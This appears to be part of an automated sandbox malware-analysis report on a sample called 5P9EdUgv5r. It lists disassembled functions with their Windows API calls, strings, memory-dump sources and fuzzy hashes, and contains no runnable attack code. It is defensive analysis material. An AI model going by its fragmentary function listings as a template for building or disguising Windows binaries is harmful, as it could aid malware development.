                                • API String ID: 0-56093855
                                • Opcode ID: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                                • Instruction ID: ab54eadc65e485df42ce906eda5c056096ffb4698984d2f2becacec77a154800
                                • Opcode Fuzzy Hash: 54adc395e48b724537452bef394bc2d2584fd3b3c37ecbc3eea87ce19503f606
                                • Instruction Fuzzy Hash: 5B017171A00346AFDB118F14ED44E663FBBEB09394B048426F809D2371EAB29C50FBB1
                                Function 00D891DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                • Instruction ID: 7e0c2428ef87c740546b6bf498bad81070821bb2342262e1b88cee4cb146b3d5
                                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                • Instruction Fuzzy Hash: 59A14671A00386AFDB21EE68C8A17BEFBE5EF55310F1C41ADE4D59B281D2389942C774
                                Function 00D6A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D680B7,?,?,?), ref: 00D6A351
                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D680B7,?,?), ref: 00D6A395
                                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?), ref: 00D6A416
                                • CloseHandle.KERNEL32(?,?,00000000,?,00D680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D6A41D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Create$CloseHandleTime
                                • String ID:
                                • API String ID: 2287278272-0
                                • Opcode ID: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                                • Instruction ID: 58d4c1bc05119cc39de60f45db3b7445b63ddf86754a29bfd007727e708debab
                                • Opcode Fuzzy Hash: a839a504798c24d563524e0958f8c0d858b653e89fdcafb2640ed739e008e607
                                • Instruction Fuzzy Hash: F341CE30288385ABD721DF68CC55BAABBE4AB85700F08091DF5D4E3291D6649A489B73
                                Function 00D8C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D889AD,?,00000000,?,00000001,?,?,00000001,00D889AD,?), ref: 00D8C0E6
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8C16F
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D867E2,?), ref: 00D8C181
                                • __freea.LIBCMT ref: 00D8C18A
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                                • Instruction ID: 537b78b37c3a9d15e4924ff2f4e9c273f845a2487c8fd294aa880641152d67f7
                                • Opcode Fuzzy Hash: 22bf0e72a197a24a927da453e15e6131a8c587d06ff08715faf5cf10e7001aeb
                                • Instruction Fuzzy Hash: E931CD72A2020AEBDB25AF65DC89DAE7BA5EB44710F084129FC04D7251EB35CD51CBB0
                                Function 00D82503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00D8251A
                                  • Part of subcall function 00D82B52: ___AdjustPointer.LIBCMT ref: 00D82B9C
                                • _UnwindNestedFrames.LIBCMT ref: 00D82531
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00D82543
                                • CallCatchBlock.LIBVCRUNTIME ref: 00D82567
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                • Instruction ID: 088ea336e681ba1c2279f7a3bb37e01b2e6b9c496e1a32cf631283856ed16acb
                                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                • Instruction Fuzzy Hash: 49011332000108BBCF12AF65CD41EEE3BBAEF58710F058455F91866120D376E961EBB1
                                Function 00D79DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00D79DBE
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D79DCD
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D79DDB
                                • ReleaseDC.USER32(00000000,00000000), ref: 00D79DE9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CapsDevice$Release
                                • String ID:
                                • API String ID: 1035833867-0
                                • Opcode ID: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                                • Instruction ID: 906613124b255d65a0b3dcdbacfa2afb192b9d9a792c3175416ac1f34aec1a16
                                • Opcode Fuzzy Hash: 758b37ed5a42f6829ba7007cef1cd63096d78c139136fc7893f2d46b3b526397
                                • Instruction Fuzzy Hash: 28E0EC31985723A7D3201BA4AC0DFAB7B55AB0E712F050016FA06D6390EAB44405EBB5
                                Function 00D82016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D82016
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D8201B
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D82020
                                  • Part of subcall function 00D8310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D8311F
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D82035
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                • Instruction ID: 10be3bb8d72352ea7f73e1b7f4dab5134ceaee52e25cf0635e7e27711cc42216
                                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                • Instruction Fuzzy Hash: 5FC04834004744E41C223AF6221A6BE0B18CC62FCABA620C2ECC817107DE064B0BA337
                                Function 00D79F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D79DF1: GetDC.USER32(00000000), ref: 00D79DF5
                                  • Part of subcall function 00D79DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D79E00
                                  • Part of subcall function 00D79DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D79E0B
                                • GetObjectW.GDI32(?,00000018,?), ref: 00D79F8D
                                  • Part of subcall function 00D7A1E5: GetDC.USER32(00000000), ref: 00D7A1EE
                                  • Part of subcall function 00D7A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D7A21D
                                  • Part of subcall function 00D7A1E5: ReleaseDC.USER32(00000000,?), ref: 00D7A2B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ObjectRelease$CapsDevice
                                • String ID: (
                                • API String ID: 1061551593-3887548279
                                • Opcode ID: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                                • Instruction ID: 5446928c14c96c69127f3b6c736c4e2bc6b4a3a7a6b8e9c692a7900d91fc6298
                                • Opcode Fuzzy Hash: f61a0b5a1ea2de2ab9f7a9978f8638172219271a674ff4d6d99c6b22684a6bc3
                                • Instruction Fuzzy Hash: CD810171608315AFD714DF68D844A2ABBE9FFC8714F00891EF98AD7260DB31AD05DB62
                                Function 00D70E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _swprintf
                                • String ID: %ls$%s: %s
                                • API String ID: 589789837-2259941744
                                • Opcode ID: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                                • Instruction ID: 6e2075809308b1c545f46fd1641aeb19cab512bb7a854e6678df183597917a60
                                • Opcode Fuzzy Hash: 46ac4c6538d805899dd7c0d68e6bd2b701b7adbd5f5c2fb5644d9e660cdd8606
                                • Instruction Fuzzy Hash: E351B57568C700FEEB211AA8DD02F367E56EB04B00F24CA06F7DE648D5F692D5906A72
                                Function 00D6772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67730
                                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D678CC
                                  • Part of subcall function 00D6A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                                  • Part of subcall function 00D6A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Attributes$H_prologTime
                                • String ID: :
                                • API String ID: 1861295151-336475711
                                • Opcode ID: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                                • Instruction ID: 4d2c29a4925669468f646026119ca418b5b5d88335c80d4baa62ded68ab5d59e
                                • Opcode Fuzzy Hash: 64787562eadfc653f7c7528fd715a1298141ab30c3d203c37d21fc46b11d4783
                                • Instruction Fuzzy Hash: E3416F71804228ABEB24EB54DD55EEEB37CEF45304F00419AB649A3092EB745F88CF71
                                Function 00D6B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: UNC$\\?\
                                • API String ID: 0-253988292
                                • Opcode ID: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                                • Instruction ID: f50f0a2418415c0d1531ff3b92acdf39411770914d7b17022cc4595fe2c65fd2
                                • Opcode Fuzzy Hash: 7eb958c4a422c68642043b462608f61d36f18372c6d481a4ea5b2c3964ed32cd
                                • Instruction Fuzzy Hash: 12418B35840359ABCF20AF21DC41EAB7BADEF857A0B144067F854E7252E771DAD4CAB0
                                Function 00D78FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: Shell.Explorer$about:blank
                                • API String ID: 0-874089819
                                • Opcode ID: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                                • Instruction ID: d2897b3d06e79f17a61fad0c374c4b72522d2f8e8c643abddb10f09632667053
                                • Opcode Fuzzy Hash: 73d08ea501fbeaeea30ea7a581823f133fe692c6efaabcb5259c3117638ef20d
                                • Instruction Fuzzy Hash: 782165722143149FDB08DF64C8A592AB7A9FF44721B14C55EF94D8B286EB70EC01CB71
                                Function 00D6EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                                  • Part of subcall function 00D6EB73: GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                                • GetCurrentProcessId.KERNEL32(?,?,?,00D6EBEC), ref: 00D6EC84
                                Strings
                                • CryptUnprotectMemory failed, xrefs: 00D6EC7C
                                • CryptProtectMemory failed, xrefs: 00D6EC3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc$CurrentProcess
                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                • API String ID: 2190909847-396321323
                                • Opcode ID: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                                • Instruction ID: 2d2ec11a583f590bb7b8e8bd3ba174106ec54a7302edeec46a3157fa5f871c92
                                • Opcode Fuzzy Hash: f6a909a268a75908105bb5cb10b035a7aa7c28fc1afb258bdbda52f3a6023cd4
                                • Instruction Fuzzy Hash: 71115B35A04324AFDB159F39DC06A6E3B54EF01720B0A811AFC05AB395DB35AE4197F4
                                Function 00D70889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00010000,00D709D0,?,00000000,00000000), ref: 00D708AD
                                • SetThreadPriority.KERNEL32(?,00000000), ref: 00D708F4
                                  • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                • String ID: CreateThread failed
                                • API String ID: 2655393344-3849766595
                                • Opcode ID: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                                • Instruction ID: 797edd4136f85ebf5427e698701765ea3debdf436cad5e3dacaffa5224f17653
                                • Opcode Fuzzy Hash: f3aa4e61c31fab1e9968396e907e7b18e4697bcc952bc4185f86a9ce56248363
                                • Instruction Fuzzy Hash: B00149B1344301AFD724BF54EC81F667B98EF01711F10403EFA8AA22C1DEA1B8409674
                                Function 00D6130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6DA98: _swprintf.LIBCMT ref: 00D6DABE
                                  • Part of subcall function 00D6DA98: _strlen.LIBCMT ref: 00D6DADF
                                  • Part of subcall function 00D6DA98: SetDlgItemTextW.USER32(?,00D9E154,?), ref: 00D6DB3F
                                  • Part of subcall function 00D6DA98: GetWindowRect.USER32(?,?), ref: 00D6DB79
                                  • Part of subcall function 00D6DA98: GetClientRect.USER32(?,?), ref: 00D6DB85
                                • GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                • SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                • String ID: 0
                                • API String ID: 2622349952-4108050209
                                • Opcode ID: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                                • Instruction ID: 0611cceda27d24b29f67a87890d34dafdc66bd2c0b4693778003809ab7334525
                                • Opcode Fuzzy Hash: 17c71f3e430916931e64124b4dfa28e0adf55aa30f18e611559727257fc91fa8
                                • Instruction Fuzzy Hash: 9AF08C3810438DABDF250F608809BBA3B98BB25305F0C8114FD4A947B1C774C995AA74
                                Function 00D7084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                                • GetLastError.KERNEL32(?), ref: 00D70860
                                  • Part of subcall function 00D66E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D66EAF
                                Strings
                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D70869
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
